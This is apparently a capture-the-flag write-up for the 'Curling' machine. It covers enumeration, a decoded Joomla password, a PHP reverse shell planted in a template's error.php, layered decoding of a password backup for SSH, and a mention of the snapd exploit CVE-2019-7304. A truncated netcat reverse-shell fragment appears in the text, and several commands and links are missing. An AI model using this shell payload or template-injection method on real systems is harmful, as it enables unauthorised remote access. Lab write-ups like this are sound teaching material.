Machine: Curling
OS: Linux

As usual I start with a normal enumeration which show only 2 ports: 22 and 80.

Now we start enumeration for this port as a webserver is available and perhaps some directory which we don't know upfront.

We can look after files as well

This secret file contain a base64 encoded text.

So decode it to get the password 'Curling2018!'

With this and the name which is shown in one of the first post's from webserver you can login to the Joomla interface.

First I tried to create a new article and post a reverse shell
&1|nc 1234 >/tmp/o"); ?>

However this didn't seams to work so I decided to edit a less important page such as error.php

As you can imagine it would have been to easy to have a user shell so fast..

Have a look around an you will notice a file called password_backup which is a hexdump, so we need to parse it with xxd and the decode it.

After decoded once you notice it's not done and you need to perform a series of decodings. I have to admit, this took more than 15 mintues to troubleshoot it because extenstions ware not added automaticaly and cause me a bit of confusion.

Than SSH access is granted with floris and 5d

User flag caught.
User to root was much more easier than expected as can be seen:

Another way to do it is CVE style.
If you are in 2019 and aware of CVE-2019-7304
What is it about? A bug in the snapd API which is a default service that come in Ubuntu instalattion. You can read about it here:
and get the exploit from github:
and run it:

I hope you enjoyed the write-up and didn't made you wasting time. Drop me a cup of coffee for Sundays ( ) or email me :)